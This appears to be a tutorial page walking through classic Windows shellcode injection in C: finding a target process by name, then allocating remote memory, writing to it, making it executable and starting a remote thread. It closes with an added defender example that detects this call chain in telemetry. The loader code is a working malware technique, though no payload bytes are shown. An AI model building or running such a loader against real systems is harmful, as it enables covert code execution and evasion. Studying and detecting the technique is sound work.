
# Process Injection --Part 2--

### **1. Finding the Target Process ID**

The function `FindProcessID(const char *processName)` is used to retrieve the Process ID (PID) of a running process by its name.

#### **How it works:**

* It takes a snapshot of all running processes using <mark style="color:purple;">`CreateToolhelp32Snapshot()`</mark>.
* It loops through the process list using <mark style="color:purple;">`Process32First()`</mark> and <mark style="color:purple;">`Process32Next()`</mark>.
* If an entry's executable name matches exactly (`strcmp(pe32.szExeFile, processName) == 0`, a case-sensitive comparison), it returns that entry's **Process ID**. If no entry matches, or the snapshot fails, it returns 0.

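```c
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <string.h>

// Function to find process ID by name (returns 0 if not found).
// Note: strcmp() on szExeFile assumes an ANSI build (UNICODE not defined).
DWORD FindProcessID(const char *processName) {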
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(PROCESSENTRY32);

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        printf("Failed to take snapshot of processes. Error: %lu\n", GetLastError());
        return 0;
    }

    if (!Process32First(snapshot, &pe32)) {
        printf("Failed to get first process. Error: %lu\n", GetLastError());
        CloseHandle(snapshot);
        return 0;
    }

    do {
        if (strcmp(pe32.szExeFile, processName) == 0) {
            CloseHandle(snapshot);
            return pe32.th32ProcessID;
        }
    } while (Process32Next(snapshot, &pe32));

    CloseHandle(snapshot);
    return 0;
}
```

***

### **2. Defining the Shellcode**

The `unsigned char shellcode[]` array holds raw machine code, written as hexadecimal byte values. After injection, these bytes are executed inside the target process.

### **3. Allocating Memory in the Target Process**

* `VirtualAllocEx()` is called to allocate memory inside the target process.
* The allocated memory is given <mark style="color:purple;">**PAGE\_READWRITE**</mark> permissions at this stage; it is made executable in a later step.
* If memory allocation fails, the program cleans up and exits.

```c
    LPVOID allocated_mem = VirtualAllocEx(hProcess, NULL, shell_code_size , MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!allocated_mem) {
        printf("[!] Memory allocation failed. Error: %lu\n", GetLastError());
        CloseHandle(hProcess);
        return -1;
    }
    printf("[+] Memory allocated at: 0x%p\n", allocated_mem);
```

***

### **4. Writing the Shellcode to the Allocated Memory**

* `WriteProcessMemory()` writes the shellcode to the allocated memory.
* If writing fails, it frees the allocated memory and exits.

```c
    // Write shellcode to allocated memory
    if (!WriteProcessMemory(hProcess, allocated_mem, shellcode, shell_code_size , NULL)) {
        printf("[!] Failed to write shellcode. Error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return -1;
    }
```

***

### **5. Changing Memory Permissions**

* `VirtualProtectEx()` changes the memory protection from **PAGE\_READWRITE** to **PAGE\_EXECUTE\_READ**.
* This allows the shellcode to be executed.

```c
// Change memory protection to executable
    DWORD oldProtect;
    if (!VirtualProtectEx(hProcess, allocated_mem, shell_code_size, PAGE_EXECUTE_READ, &oldProtect)) {
        printf("[!] Failed to change memory protection. Error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return -1;
    }
```

***

### **6. Creating a Remote Thread**

* `CreateRemoteThread()` is used to create a new thread inside the target process.
* The **entry point** for this thread is the allocated memory containing the shellcode.
* If the function fails, the program cleans up and exits.

```c
// Create a remote thread to execute shellcode
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)allocated_mem, NULL, 0, NULL);
    if (!hThread) {
        printf("[!] Failed to create remote thread. Error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return -1;
    }
```

***

### **7. Waiting for the Shellcode Execution**

* `WaitForSingleObject(hThread, INFINITE)` waits for the shellcode execution to complete.
* `VirtualFreeEx()` releases the allocated memory.
* `CloseHandle(hThread)` and `CloseHandle(hProcess)` close the handles to prevent resource leaks.
* A final message `[+] We Are Do it <3 Happy Hack` is printed.

```c
// Wait for the shellcode to execute
    WaitForSingleObject(hThread, INFINITE);

    // Clean up
    VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE);
    CloseHandle(hThread);
    CloseHandle(hProcess);
    printf("[+] We Are Do it <3 Happy Hack\n");
```
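
From the defender's side, the steps above form an ordered chain (remote allocation, remote write, protection change to executable, remote thread start inside the same region) that endpoint telemetry can correlate. The following C program is an added example, not code from the original page: the event schema, the `find_injection_chain` function and the sample events are constructed for illustration, and it also covers the more general case where the region is allocated executable from the start.

```c
#include <stdint.h>
#include <stdio.h>

/* The page's four remote calls as a sensor might log them (assumed schema). */
typedef enum { EV_ALLOC, EV_WRITE, EV_PROTECT, EV_THREAD } ev_kind;
#define EXEC_MASK 0xF0u /* PAGE_EXECUTE (0x10) through PAGE_EXECUTE_WRITECOPY (0x80) */

typedef struct {
    ev_kind  kind;
    uint32_t src_pid, dst_pid; /* calling process and target process */
    uint64_t addr, size;       /* region base and size, or thread start address */
    uint32_t prot;             /* page protection (ALLOC and PROTECT only) */
} event;

/* Returns the index of the remote-thread event that completes the chain
   alloc -> write -> executable -> thread start inside the region, else -1. */
int find_injection_chain(const event *ev, size_t n) {
    for (size_t a = 0; a < n; a++) {
        if (ev[a].kind != EV_ALLOC || ev[a].src_pid == ev[a].dst_pid) continue;
        uint64_t lo = ev[a].addr, hi = lo + ev[a].size;
        int written = 0, exec = (ev[a].prot & EXEC_MASK) != 0;
        for (size_t i = a + 1; i < n; i++) {
            const event *e = &ev[i];
            if (e->src_pid != ev[a].src_pid || e->dst_pid != ev[a].dst_pid) continue;
            if (e->addr < lo || e->addr >= hi) continue; /* other region */
            if (e->kind == EV_WRITE) written = 1;
            else if (e->kind == EV_PROTECT) exec = (e->prot & EXEC_MASK) != 0;
            else if (e->kind == EV_THREAD && written && exec) return (int)i;
        }
    }
    return -1;
}
/* Constructed sample: PID 4100 runs the page's sequence against PID 812. */
static const event sample_inject[] = {
    { EV_ALLOC,   4100, 812, 0x1f0000, 0x1000, 0x04 }, /* PAGE_READWRITE */
    { EV_WRITE,   4100, 812, 0x1f0000, 0x1cc,  0 },
    { EV_PROTECT, 4100, 812, 0x1f0000, 0x1cc,  0x20 }, /* PAGE_EXECUTE_READ */
    { EV_THREAD,  4100, 812, 0x1f0000, 0,      0 },
};
/* Constructed sample: data written, never made executable, thread starts elsewhere. */
static const event sample_benign[] = {
    { EV_ALLOC,  4100, 812, 0x1f0000,       0x1000, 0x04 },
    { EV_WRITE,  4100, 812, 0x1f0000,       0x40,   0 },
    { EV_THREAD, 4100, 812, 0x7ff600001000, 0,      0 },
};
int main(void) {
    printf("%d %d\n", find_injection_chain(sample_inject, 4), find_injection_chain(sample_benign, 3));
    return 0;
}
```

The correlation keys on the caller/target PID pair and on the thread start address falling inside a region that was written remotely and is executable, so cross-process writes that never lead to execution are not flagged.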

***
